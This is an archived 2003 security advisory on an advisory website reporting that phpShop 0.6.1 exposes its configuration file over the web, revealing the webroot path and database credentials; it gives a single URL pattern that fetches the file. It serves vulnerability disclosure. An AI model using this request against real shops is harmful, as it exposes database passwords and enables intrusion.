logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

PHPShop Viewing dbase information
Date: 2003-04-01

Author : subj <r2subj3ct@dwclan.org>

Product : Edikon Release 0.6 of PHPShop
Version : 0.6.1
WebSite : http://www.phpshop.org
Problem : Viewing dbase information

Description:
------------

In phpShop we can get access to a database of the server as the file of a configuration is accessible to each user. As we can find out a full way up to the server and up to the script.

/etc/phpshop-dist.cfg
=====================
[...]

"WEBROOT" => "/home/httpd/html/",

[...]

"DB_HOST" => "localhost",
"DB_NAME" => "phpshop",
"DB_USER" => "dbuser",
"DB_PWD" => "dbpass",

[...]
=====================

Exploit:
--------

http://[somehost]/phpshop/etc/phpshop-dist.cfg


Contacts:
---------

r2subj3ct@dwclan.org
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc

Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy